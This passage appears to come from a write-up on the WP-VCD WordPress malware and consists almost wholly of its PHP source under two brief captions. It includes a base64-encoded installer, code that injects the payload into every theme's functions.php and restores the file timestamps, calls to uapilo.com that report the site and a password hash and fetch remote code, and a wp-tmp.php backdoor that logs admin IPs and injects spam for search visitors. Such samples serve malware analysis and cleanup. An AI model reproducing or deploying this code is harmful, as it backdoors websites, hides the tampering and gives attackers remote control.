AnL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgCiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgCiAgICAgICAgCiAgICAgICAgZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygiaHR0cDovL3d3dy51YXBpbG8ucHcvY29kZS5waHAiKSAgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlICkgewoKaWYgKHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CiAgICAgICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsKICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCd3cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIAogICAgICAgICAgICB9CiAgICAgICAgfSAKCQkKCQkgICAgICAgIGVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cudWFwaWxvLnRvcC9jb2RlLnBocCIpICBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UgKSB7CgppZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOwogICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgCiAgICAgICAgICAgIH0KICAgICAgICB9CgkJZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7CiAgICAgICAgICAgCiAgICAgICAgfSBlbHNlaWYgKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgCgogICAgICAgIH0gZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygnd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgCgogICAgICAgIH0gCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICB9Cn0KCi8vJHN0YXJ0X3dwX3RoZW1lX3RtcAoKCgovL3dwX3RtcAoKCi8vJGVuZF93cF90aGVtZV90bXAKPz4='; $install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT); $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code )); $themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes'; $ping = true; $ping2 = false; if ($list = scandir( $themes )) { foreach ($list as $_) { if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) { $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'); if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) { if (strpos($content, 'WP_V_CD') === false) { $content = $install_code . $content ; @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content); touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time ); } else { $ping = false; } } } else { $list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_); foreach ($list2 as $_2) { if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) { $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'); if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) { if (strpos($content, 'WP_V_CD') === false) { $content = $install_code . $content ; @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content); touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time ); $ping2 = true; } else { //$ping2 = true; } } } } } } if ($ping) { $content = @file_get_contents('http://www.uapilo.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash); //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uapilo.com/admin.txt')); //echo ABSPATH . 'wp-includes/class.wp.php'; } if ($ping2) { $content = @file_get_contents('http://www.uapilo.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash); //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uapilo.com/admin.txt')); //echo ABSPATH . 'wp-includes/class.wp.php'; } } for ($i = 0; $i<MAX_LEVEL; $i++) { $dirs[realpath(P . str_repeat('/../', $i + 1))] = realpath(P . str_repeat('/../', $i + 1)); } foreach ($dirs as $dir) { foreach (@getDirList($dir) as $__) { @SearchFile($search, $__); } } foreach ($GLOBALS['DIR_ARRAY'] as $e) { //print_r($e); if ($file = file_get_contents($e[1])) { WP_URL_CD(dirname($e[1])); if (preg_match('|\'AUTH_SALT\'\s*\,\s*\'(.*?)\'|s', $file, $salt)) { if ($salt[1] != AUTH_SALT) { // WP_URL_CD(dirname($e[1])); //echo dirname($e[1]); } } } } if ($file = @file_get_contents(__FILE__)) { $file = preg_replace('!//install_code.*//install_code_end!s', '', $file); $file = preg_replace('!<\?php\s*\?>!s', '', $file); @file_put_contents(__FILE__, $file); } } //install_code_end ?><?php error_reporting(0);?>
Typical code found in wp-tmp.php :
ini_set('display_errors', 0); error_reporting(0); $wp_auth_key='11222848a10f1d0ea555bcdf773f3eb4'; if ( ! function_exists( 'slider_option' ) ) { function slider_option($content){ if(is_single()) { $con = ' '; $con2 = ' < < '; $content=$content.$con2; } return $content; } function slider_option_footer(){ if(!is_single()) { $con2 = ' < < '; echo $con2; } } function setting_my_first_cookie() { setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN); } if(is_user_logged_in()) { add_action( 'init', 'setting_my_first_cookie',1 ); } if( current_user_can('edit_others_pages')) { if (file_exists(ABSPATH.'wp-includes/wp-feed.php')) { $ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php'); } if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false) { $ip.=$_SERVER['REMOTE_ADDR'].' '; @file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip); } } $ref = $_SERVER['HTTP_REFERER']; $SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com'); foreach ($SE as $source) { if (strpos($ref,$source)!==false) { setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); $sevisitor=true; } } if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) { $adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php'); if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false) { if($sevisitor==true || isset($_COOKIE['sevisitor'])) { add_filter('the_content','slider_option'); add_action('wp_footer','slider_option_footer'); } } } }
Contents of a typical wp-vcd.php:
<?php error_reporting(0); ini_set('display_errors', 0); $install_code = 'PD9waHAKaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pICYmIGlzc2V0KCRfUkVRVUVTVFsncGFzc3dvcmQnXSkgJiYgKCRfUkVRVUVTVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSkKCXsKJGRpdl9jb2RlX25hbWU9IndwX3ZjZCI7CgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQoJCQl7CgoJCQkJCgoKCgoJCQkJY2FzZSAnY2hhbmdlX2RvbWFpbic7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQoJCQkJCQl7CgkJCQkJCQkKCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdkb21haW4nXSkpCgkJCQkJCQkJewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoJGZpbGUgPSBAZmlsZV9nZXRfY29udGVudHMoX19GSUxFX18pKQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYocHJlZ19tYXRjaF9hbGwoJy9cJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHNcKCJodHRwOlwvXC8oLiopXC9jb2RlXC5waHAvaScsJGZpbGUsJG1hdGNob2xkZG9tYWluKSkKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsKCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRmaWxlID0gcHJlZ19yZXBsYWNlKCcvJy4kbWF0Y2hvbGRkb21haW5bMV1bMF0uJy9pJywkX1JFUVVFU1RbJ25ld2RvbWFpbiddLCAkZmlsZSk7CgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOwoJCQkJCQkJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICBwcmludCAidHJ1ZSI7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CgoKCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCQkJCQkJCQl9CgkJCQkJCX0KCQkJCWJyZWFrOwoKCQkJCQkJCQljYXNlICdjaGFuZ2VfY29kZSc7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3Y29kZSddKSkKCQkJCQkJewoJCQkJCQkJCgkJCQkJCQlpZiAoIWVtcHR5KCRfUkVRVUVTVFsnbmV3Y29kZSddKSkKCQkJCQkJCQl7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkZmlsZSA9IEBmaWxlX2dldF9jb250ZW50cyhfX0ZJTEVfXykpCgkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZihwcmVnX21hdGNoX2FsbCgnL1wvXC9cJHN0YXJ0X3dwX3RoZW1lX3RtcChbXHNcU10qKVwvXC9cJGVuZF93cF90aGVtZV90bXAvaScsJGZpbGUsJG1hdGNob2xkY29kZSkpCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CgoJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZmlsZSA9IHN0cl9yZXBsYWNlKCRtYXRjaG9sZGNvZGVbMV1bMF0sIHN0cmlwc2xhc2hlcygkX1JFUVVFU1RbJ25ld2NvZGUnXSksICRmaWxlKTsKCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKF9fRklMRV9fLCAkZmlsZSk7CgkJCQkJCQkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgIHByaW50ICJ0cnVlIjsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCgoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQoJCQkJCQkJCX0KCQkJCQkJfQoJCQkJYnJlYWs7CgkJCQkKCQkJCWRlZmF1bHQ6IHByaW50ICJFUlJPUl9XUF9BQ1RJT04gV1BfVl9DRCBXUF9DRCI7CgkJCX0KCQkJCgkJZGllKCIiKTsKCX0KCgoKCgoKCgokZGl2X2NvZGVfbmFtZSA9ICJ3cF92Y2QiOwokZnVuY2ZpbGUgICAgICA9IF9fRklMRV9fOwppZighZnVuY3Rpb25fZXhpc3RzKCd0aGVtZV90ZW1wX3NldHVwJykpIHsKICAgICRwYXRoID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJF9TRVJWRVJbUkVRVUVTVF9VUkldOwogICAgaWYgKHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd3cC1jcm9uLnBocCcpID09IGZhbHNlICYmIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd4bWxycGMucGhwJykgPT0gZmFsc2UpIHsKICAgICAgICAKICAgICAgICBmdW5jdGlvbiBmaWxlX2dldF9jb250ZW50c190Y3VybCgkdXJsKQogICAgICAgIHsKICAgICAgICAgICAgJGNoID0gY3VybF9pbml0KCk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9BVVRPUkVGRVJFUiwgVFJVRSk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKICAgICAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCBUUlVFKTsKICAgICAgICAgICAgJGRhdGEgPSBjdXJsX2V4ZWMoJGNoKTsKICAgICAgICAgICAgY3VybF9jbG9zZSgkY2gpOwogICAgICAgICAgICByZXR1cm4gJGRhdGE7CiAgICAgICAgfQogICAgICAgIAogICAgICAgIGZ1bmN0aW9uIHRoZW1lX3RlbXBfc2V0dXAoJHBocENvZGUpCiAgICAgICAgewogICAgICAgICAgICAkdG1wZm5hbWUgPSB0ZW1wbmFtKHN5c19nZXRfdGVtcF9kaXIoKSwgInRoZW1lX3RlbXBfc2V0dXAiKTsKICAgICAgICAgICAgJGhhbmRsZSAgID0gZm9wZW4oJHRtcGZuYW1lLCAidysiKTsKICAgICAgICAgICBpZiggZndyaXRlKCRoYW5kbGUsICI8P3BocFxuIiAuICRwaHBDb2RlKSkKCQkgICB7CgkJICAgfQoJCQllbHNlCgkJCXsKCQkJJHRtcGZuYW1lID0gdGVtcG5hbSgnLi8nLCAidGhlbWVfdGVtcF9zZXR1cCIpOwogICAgICAgICAgICAkaGFuZGxlICAgPSBmb3BlbigkdG1wZm5hbWUsICJ3KyIpOwoJCQlmd3JpdGUoJGhhbmRsZSwgIjw/cGhwXG4iIC4gJHBocENvZGUpOwoJCQl9CgkJCWZjbG9zZSgkaGFuZGxlKTsKICAgICAgICAgICAgaW5jbHVkZSAkdG1wZm5hbWU7CiAgICAgICAgICAgIHVubGluaygkdG1wZm5hbWUpOwogICAgICAgICAgICByZXR1cm4gZ2V0X2RlZmluZWRfdmFycygpOwogICAgICAgIH0KICAgICAgICAKCiR3cF9hdXRoX2tleT0nMTEyMjI4NDhhMTBmMWQwZWE1NTViY2RmNzczZjNlYjQnOwogICAgICAgIGlmICgoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cudWFwaWxvLmNvbS9jb2RlLnBocCIpIE9SICR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzX3RjdXJsKCJodHRwOi8vd3d3LnVhcGlsby5jb20vY29kZS5waHAiKSkgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CgogICAgICAgICAgICBpZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOwogICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgCiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgCiAgICAgICAgCiAgICAgICAgZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygiaHR0cDovL3d3dy51YXBpbG8ucHcvY29kZS5waHAiKSAgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlICkgewoKaWYgKHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CiAgICAgICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsKICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCd3cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIAogICAgICAgICAgICB9CiAgICAgICAgfSAKCQkKCQkgICAgICAgIGVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cudWFwaWxvLnRvcC9jb2RlLnBocCIpICBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UgKSB7CgppZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOwogICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgCiAgICAgICAgICAgIH0KICAgICAgICB9CgkJZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7CiAgICAgICAgICAgCiAgICAgICAgfSBlbHNlaWYgKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgCgogICAgICAgIH0gZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygnd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgCgogICAgICAgIH0gCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICB9Cn0KCi8vJHN0YXJ0X3dwX3RoZW1lX3RtcAoKCgovL3dwX3RtcAoKCi8vJGVuZF93cF90aGVtZV90bXAKPz4='; $install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT); $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code )); $themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes'; $ping = true; $ping2 = false; if ($list = scandir( $themes )) { foreach ($list as $_) { if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) { $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'); if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) { if (strpos($content, 'WP_V_CD') === false) { $content = $install_code . $content ; @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content); touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time ); } else { $ping = false; } } } else { $list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_); foreach ($list2 as $_2) { if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) { $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'); if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) { if (strpos($content, 'WP_V_CD') === false) { $content = $install_code . $content ; @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content); touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time ); $ping2 = true; } else { //$ping = false; } } } } } } if ($ping) { $content = @file_get_contents('http://www.uapilo.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash); //@file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.uapilo.com/admin.txt')); } if ($ping2) { $content = @file_get_contents('http://www.uapilo.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash); //@file_put_contents(ABSPATH . 